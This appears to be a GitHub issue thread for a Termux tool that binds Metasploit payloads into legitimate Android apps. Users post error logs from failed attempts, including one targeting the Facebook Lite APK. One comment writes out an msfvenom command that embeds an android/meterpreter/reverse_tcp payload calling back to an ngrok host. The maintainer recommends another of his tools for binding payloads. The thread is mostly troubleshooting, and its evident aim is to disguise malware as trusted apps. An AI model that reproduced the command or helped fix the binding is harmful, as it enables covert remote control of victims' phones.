### ISSUE TITLE
No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/tmp/d20190308-1926-r7hacw/original/AndroidManifest.xml

### ISSUE THREAD

**Issue by rekcahkumar** [Hax4us/Tmux-Bunch#42]
[*] Please wait while binding.......🕜

/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
Using APK template: ttt.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/tmp/d20190308-1926-r7hacw/original/AndroidManifest.xml
 signing apk .......
mv: cannot stat '/data/data/com.termux/files/home/Tmux-Bunch/unsign/output.apk': No such file or directory
Exception in thread "main" java.io.FileNotFoundException: /data/data/com.termux/files/home/Tmux-Bunch/unsign/virus.apk: open failed: ENOENT (No such file or directory)
        at libcore.io.IoBridge.open(IoBridge.java:485)
        at java.io.RandomAccessFile.<init>(RandomAccessFile.java:288)
        at java.io.RandomAccessFile.<init>(RandomAccessFile.java:151)
        at net.fornwall.apksigner.zipio.ZipInput.<init>(ZipInput.java:20)
        at net.fornwall.apksigner.ZipSigner.signZip(ZipSigner.java:146)
        at net.fornwall.apksigner.Main.main(Main.java:90)
Caused by: android.system.ErrnoException: open failed: ENOENT (No such file or directory)
        at libcore.io.Linux.open(Native Method)
        at libcore.io.BlockGuardOs.open(BlockGuardOs.java:210)
        at libcore.io.IoBridge.open(IoBridge.java:471)
        ... 5 more
rm: cannot remove '/data/data/com.termux/files/home/Tmux-Bunch/unsign/virus.apk': No such file or directory

 We will met again :D , have a payload day..! 📢

 press ENTER for main menu

**Comment by rekcahkumar** [comment]
$ ./msfvenom -x /storage/emulated/0/ttt.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10464 -o /sdcard/test.apk
/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
Using APK template: /storage/emulated/0/ttt.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/tmp/d20190308-5295-z6ue3p/original/AndroidManifest.xml

EVEN I TRY MANUALLY STILL SAME

**Comment by remo7777** [comment]
> [*] Please wait while binding.......
> 
> /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
> Using APK template: ttt.apk
> [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> [-] No arch selected, selecting arch: dalvik from the payload
> [_] Creating signing key and keystore.. [_] Decompiling original APK..
> [*] Decompiling payload APK..
> Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/tmp/d20190308-1926-r7hacw/original/AndroidManifest.xml
> signing apk .......
> mv: cannot stat '/data/data/com.termux/files/home/Tmux-Bunch/unsign/output.apk': No such file or directory
> Exception in thread "main" java.io.FileNotFoundException: /data/data/com.termux/files/home/Tmux-Bunch/unsign/virus.apk: open failed: ENOENT (No such file or directory)
> at libcore.io.IoBridge.open(IoBridge.java:485)
> at java.io.RandomAccessFile.(RandomAccessFile.java:288)
> at java.io.RandomAccessFile.(RandomAccessFile.java:151)
> at net.fornwall.apksigner.zipio.ZipInput.(ZipInput.java:20)
> at net.fornwall.apksigner.ZipSigner.signZip(ZipSigner.java:146)
> at net.fornwall.apksigner.Main.main(Main.java:90)
> Caused by: android.system.ErrnoException: open failed: ENOENT (No such file or directory)
> at libcore.io.Linux.open(Native Method)
> at libcore.io.BlockGuardOs.open(BlockGuardOs.java:210)
> at libcore.io.IoBridge.open(IoBridge.java:471)
> ... 5 more
> rm: cannot remove '/data/data/com.termux/files/home/Tmux-Bunch/unsign/virus.apk': No such file or directory
> 
> We will met again :D , have a payload day..! 
> 
> press ENTER for main menu



> $ ./msfvenom -x /storage/emulated/0/ttt.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10464 -o /sdcard/test.apk
> /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
> Using APK template: /storage/emulated/0/ttt.apk
> [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
> [-] No arch selected, selecting arch: dalvik from the payload
> [_] Creating signing key and keystore.. [_] Decompiling original APK..
> [*] Decompiling payload APK..
> Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/tmp/d20190308-5295-z6ue3p/original/AndroidManifest.xml
> 
> EVEN I TRY MANUALLY STILL SAME

apktool problem brother

**Comment by remo7777** [comment]
but i have signed problem or something els that signed apk not installed on device..
i know again fix this issue soon...👍 💕💞 💕💞

**Comment by Bernie254** [comment]
[*] Please wait while binding.......🕜

/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.
Using APK template: Lite_com.facebook.lite.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/tmp/d20190423-31649-15rljdu/original/AndroidManifest.xml
 signing apk .......
mv: cannot stat '/data/data/com.termux/files/home/Tmux-Bunch/unsign/output.apk': No such file or directory
Bad system call
rm: cannot remove '/data/data/com.termux/files/home/Tmux-Bunch/unsign/Bena.apk.apk': No such file or directory

 We will met again :D , have a payload day..!  📢

 press ENTER for main menu.

PREASE HELP I HAVE TRIED WITH ALL APPS

**Comment by Shubhendra-kushwaha** [comment]
I have also same issue 
Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/tmp/d20190928-5595-7hirzv/original/AndroidManifest.xml
....

**Comment by Hax4us** [comment]
@Shubhendra-kushwaha hii , don't use it because now I don't maintain it but you can use my similar tool __Apkmod__ https://GitHub.com/Hax4Us/Apkmod to bind payloads.

**Comment by kcubeterm** [comment]
Same error with apkmod also in termux

**Comment by Hax4us** [comment]
then open issue on my apkmod repo with all necessary information
